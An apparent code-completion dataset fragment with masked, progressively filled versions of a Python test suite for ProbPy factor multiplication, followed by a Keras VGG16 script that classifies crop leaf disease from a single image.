range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n 
\"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n <mask token>\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n 
\"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def 
par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-3": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = [self.X_factor.mult(self.scalar), self.X_factor.mult(self\n .scalarf), self.scalarf.mult(self.X_factor)]\n par_res = [self.X_par_factor.mult(self.scalar), self.\n X_par_factor.mult(self.par_scalarf), self.par_scalarf.mult(\n self.X_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = 
self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n 
par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-4": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = [self.X_factor.mult(self.scalar), self.X_factor.mult(self\n .scalarf), self.scalarf.mult(self.X_factor)]\n par_res = [self.X_par_factor.mult(self.scalar), self.\n X_par_factor.mult(self.par_scalarf), self.par_scalarf.mult(\n self.X_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_5(self):\n \"\"\"\n f(X, Y) f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.X_factor)\n par_res = self.XY_par_factor.mult(self.X_par_factor)\n 
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n 
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-5": "from nose.tools import with_setup, nottest\n\nfrom tests.par_test_base import ParTestBase\nfrom ProbPy import RandVar, Factor, ParFactor\n\n\nclass TestFactorMult(ParTestBase):\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n\n res = [\n self.X_factor.mult(self.scalar),\n self.X_factor.mult(self.scalarf),\n self.scalarf.mult(self.X_factor),\n ]\n\n par_res = [\n self.X_par_factor.mult(self.scalar),\n self.X_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.X_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = [\n self.XY_factor.mult(self.scalar),\n self.XY_factor.mult(self.scalarf),\n self.scalarf.mult(self.XY_factor),\n ]\n\n par_res = [\n self.XY_par_factor.mult(self.scalar),\n self.XY_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XY_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_2(self):\n \"\"\"\n f(X, Y, Z), scalar\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n\n res 
= self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_5(self):\n \"\"\"\n f(X, Y) f(X)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.X_factor)\n par_res = self.XY_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n\n res = 
self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-ids": [
12,
14,
15,
16,
19
]
}
|
[
12,
14,
15,
16,
19
] |
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 5 02:39:55 2017
@author: sparsh
"""
"""
Crop Disease Classification Project for Code Fun Do 2017 - IIT Roorkee
"""
"""
File for predicting a test image.
"""
import os
os.environ['THEANO_FLAGS'] = "device=gpu1, floatX=float32"
import theano
import numpy as np
np.random.seed(1)
import pandas as pd
import h5py
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
from PIL import Image
K.set_image_dim_ordering('th')
#Path to model weights file
weights_path = "E:\\Interesting\\Code Fun Do 2017\\vgg16_weights.h5"
top_model_weights_path = "E:\\Interesting\\Code Fun Do 2017\\bottleneck_fc_model.h5"
#Unknown Image Location
validation_data_dir = "E:\\Interesting\\Code Fun Do 2017\\Trial\\cercospora_leaf_spot_365.jpg"
#validation_data_dir = "E:\\Interesting\\Code Fun Do 2017\\Trial"
#input image dimensions
img_width = 200
img_height = 200
input_shape = (3, img_height, img_width)
#Model parameters
batch_size = 32
nb_classes = 4
nb_epoch = 3
nb_train_samples = 50
nb_validation_samples = 25
# build the VGG16 network
model = Sequential()
model.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))
model.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
# load the weights of the VGG16 networks
# (trained on ImageNet, won the ILSVRC competition in 2014)
# note: when there is a complete match between your model definition
# and your weight savefile, you can simply call model.load_weights(filename)
assert os.path.exists(weights_path), "Model weights not found (see 'weights_path' variable in script)."
f = h5py.File(weights_path)
for k in range(f.attrs['nb_layers']):
if k >= len(model.layers):
# we don't look at the last (fully-connected) layers in the savefile
break
g = f['layer_{}'.format(k)]
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
model.layers[k].set_weights(weights)
f.close()
print("Model loaded.\n")
# build a classifier model to put on top of the convolutional model
top_model = Sequential()
top_model.add(Flatten(input_shape=model.output_shape[1:]))
top_model.add(Dense(256, activation='relu'))
top_model.add(Dropout(0.5))
top_model.add(Dense(nb_classes, activation='softmax'))
# note that it is necessary to start with a fully-trained
# classifier, including the top classifier,
# in order to successfully do fine-tuning
top_model.load_weights(top_model_weights_path)
# add the model on top of the convolutional base
model.add(top_model)
#print("DC.\n")
print("Final Model Assembled.\n")
#datagen = ImageDataGenerator(rescale=1./255)
#generator = datagen.flow_from_directory(
# validation_data_dir,
# target_size=(img_width, img_height),
# batch_size=32,
# class_mode=None,
# shuffle=False)
#bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples)
#np.save(open('bottleneck_features_validation.npy', 'w'), bottleneck_features_validation)
#print("Testing features stored.\n")
#data = np.load(open('bottleneck_features_validation.npy'))
img = Image.open(validation_data_dir)
img.load()
#print("chutiya.\n")
data = np.asarray(img, dtype="int32")
#print("harami.\n")
print(data.shape)
data = data.reshape(1, 3, 200, 200)
print("Prediction begins.\n")
output = model.predict_classes(data, batch_size=32, verbose=1)
print(output)
|
normal
|
{
"blob_id": "96210942b01c510300120913bed1bc6d497a39a9",
"index": 1945,
"step-1": "<mask token>\n",
